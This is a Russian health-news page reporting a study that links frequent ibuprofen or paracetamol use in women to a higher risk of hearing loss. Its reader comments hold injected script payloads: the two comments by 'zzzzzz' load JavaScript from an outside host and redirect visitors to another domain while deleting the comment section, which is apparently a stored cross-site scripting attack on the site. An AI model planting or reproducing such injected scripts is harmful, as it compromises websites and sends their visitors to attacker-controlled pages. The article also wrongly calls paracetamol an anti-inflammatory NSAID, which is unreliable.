Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Два популярных анальгетик...  >>  Два популярных анальгетика вызывают потерю слуха
 
Обратная связь
 

Два популярных анальгетика вызывают потерю слуха

Размер шрифта
04 октября 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Американские ученые установили, что у женщин, которые принимают ибупрофен или парацетамол более двух раз в неделю, повышается риск потери слуха.

обезболивающее потеря слуха

Ибупрофен и парацетамол

Ибупрофен и парацетамол относятся к группе нестероидных противовоспалительных средств (НПВС), которые обладают обезболивающим, жаропонижающим и противовоспалительным эффектами, т.е. устраняют боль, снижают температуру и уменьшают воспаление. Механизмом действия НПВС является способность подавлять активность фермента циклооксигеназы. Этот фермент ускоряет превращение арахидоновой кислоты в простагландины, которые выполняют различные функции.

Простагландины накапливаются в очаге воспаления и приводят к появлению характерных признаков: покраснения, отека и боли; повышают чувствительность рецепторов боли к определенным веществам (гистамину, брадикинину) и механическим воздействиям; увеличивают чувствительность центров терморегуляции к действию веществ, вызывающих повышение температуры. Блокируя активность циклооксигеназы, НПВС препятствуют образованию простагландинов, что приводит к уменьшению боли и воспаления, а также снижению температуры.

Суть исследования

В ходе проведения исследования ученые проанализировали данные 62 261 женщины в возрасте от 31 года до 48 лет. Женщины находились под наблюдением в течение 14 лет (с 1995 по 2009 годы). За время наблюдения слух потеряли 10 012 женщин.

По сравнению с женщинами, которые принимали ибупрофен менее одного раза в неделю, риск потери слуха у женщин, использовавших препарат 2-3 раза в неделю, был на 13% выше, а у женщин, которые использовали препарат 4-5 раз в неделю, – на 24%.

По сравнению с женщинами, которые принимали ацетаминофен менее одного раза в неделю, риск потери слуха у женщин, использовавших препарат 2-3 раза в неделю, был на 11% выше, а у женщин, которые использовали препарат 4-5 раз в неделю, – на 21%.

Результаты

В качестве возможной причины данной закономерности ученые называют ухудшение кровоснабжения внутреннего уха и нарушение его функции.

Эти обезболивающие препараты не лишены побочных эффектов. Если на фоне приема ибупрофена или ацетаминофена вы заметили ухудшение слуха, проконсультируйтесь с врачом. Он установит причину проблемы и при необходимости подберет достойную альтернативу.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 21:27

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 23:34

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Белок, охраняющий слух   Что ваши уши говорят о вас?   Как почистить уши и не оглохнуть? Можно ли чистить уши ушными палочками?   Змеиный яд обезболивает как морфин  
03 октября 2012Два популярных анальгетика вызывают потерю слуха! 25 октября 2012Ученые научили слышать глухих
 
10 августа 2012Новая стратегия, охраняющая слух 21 ноября 2012Змеиный яд обезболивает как морфин
 

Слайдшоу

1
Ушные инфекции у детей ИЗ-ЗА ЧЕГО вы оглохнете?
Как оглохнуть навсегда Что делать с ушной серой?
Как не оглохнуть на отдыхе Болезни, которые должен знать каждый родитель
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.